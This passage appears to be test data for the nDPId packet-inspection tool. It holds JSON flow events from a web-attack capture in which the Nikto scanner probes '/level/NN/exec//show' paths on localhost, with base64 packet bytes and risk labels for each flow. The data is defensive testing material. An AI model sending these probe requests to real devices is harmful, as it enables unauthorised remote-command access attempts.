{"hostname":"127.0.0.1","url":"127.0.0.1\/level\/35\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001282)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277614,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":1,"flow_last_seen":1576420277614,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277614,"pkt":"AAAAAAAAAAAAAAAACABFAADIgnNAAEAGubp\/AAABfwAAAcYqH5AJ3LqL6hJPloAYAED+vAAAAQEICp1m\/pWdZv6VR0VUIC9sZXZlbC8zNi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277614,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/36\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001283)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":1,"flow_last_seen":1576420277615,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277615,"pkt":"AAAAAAAAAAAAAAAACABFAADIj29AAEAGrL5\/AAABfwAAAcYsH5DrNbeX8ap25oAYAED+vAAAAQEICp1m\/pedZv6XR0VUIC9sZXZlbC8zNy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjg0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/37\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001284)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277616,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":1,"flow_last_seen":1576420277616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277616,"pkt":"AAAAAAAAAAAAAAAACABFAADImrpAAEAGoXN\/AAABfwAAAcYuH5CDY6JF2zT1KYAYAED+vAAAAQEICp1m\/pidZv6YR0VUIC9sZXZlbC8zOC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277616,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/38\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001285)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277618,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":1,"flow_last_seen":1576420277618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277618,"pkt":"AAAAAAAAAAAAAAAACABFAADIUbFAAEAG6nx\/AAABfwAAAcYwH5C3PmlUu95eg4AYAED+vAAAAQEICp1m\/pqdZv6aR0VUIC9sZXZlbC8zOS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277618,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/39\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001286)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277619,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":1,"flow_last_seen":1576420277619,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277619,"pkt":"AAAAAAAAAAAAAAAACABFAADI5L9AAEAGV25\/AAABfwAAAcYyH5D7t9xCdJSM64AYAED+vAAAAQEICp1m\/pudZv6bR0VUIC9sZXZlbC80MC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjg3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277619,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/40\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001287)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277622,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":1,"flow_last_seen":1576420277622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277622,"pkt":"AAAAAAAAAAAAAAAACABFAADIjX9AAEAGrq5\/AAABfwAAAcY0H5DiALWBzWdeg4AYAED+vAAAAQEICp1m\/p6dZv6eR0VUIC9sZXZlbC80MS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODgpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277622,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/41\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001288)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277624,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":1,"flow_last_seen":1576420277624,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277624,"pkt":"AAAAAAAAAAAAAAAACABFAADIagJAAEAG0it\/AAABfwAAAcY2H5Bh+1L\/IgWJKIAYAED+vAAAAQEICp1m\/p+dZv6fR0VUIC9sZXZlbC80Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277624,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/42\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001289)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277625,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":1,"flow_last_seen":1576420277625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277625,"pkt":"AAAAAAAAAAAAAAAACABFAADI3axAAEAGXoF\/AAABfwAAAcY4H5AuBeVV4Hsa\/oAYAED+vAAAAQEICp1m\/qGdZv6hR0VUIC9sZXZlbC80My9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTApDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277625,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/43\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001290)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277627,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":1,"flow_last_seen":1576420277627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277627,"pkt":"AAAAAAAAAAAAAAAACABFAADIYLhAAEAG23V\/AAABfwAAAcY6H5DQG1hJOevWU4AYAED+vAAAAQEICp1m\/qOdZv6iR0VUIC9sZXZlbC80NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTEpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277627,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/44\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001291)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277628,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":1,"flow_last_seen":1576420277628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277628,"pkt":"AAAAAAAAAAAAAAAACABFAADID1ZAAEAGLNh\/AAABfwAAAcY8H5AV\/jesxRnzeoAYAED+vAAAAQEICp1m\/qSdZv6kR0VUIC9sZXZlbC80NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjkyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277628,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/45\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001292)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277630,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":1,"flow_last_seen":1576420277630,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277630,"pkt":"AAAAAAAAAAAAAAAACABFAADI0WBAAEAGas1\/AAABfwAAAcY+H5DCTOmi+t3hCIAYAED+vAAAAQEICp1m\/qWdZv6lR0VUIC9sZXZlbC80Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjkzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277630,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 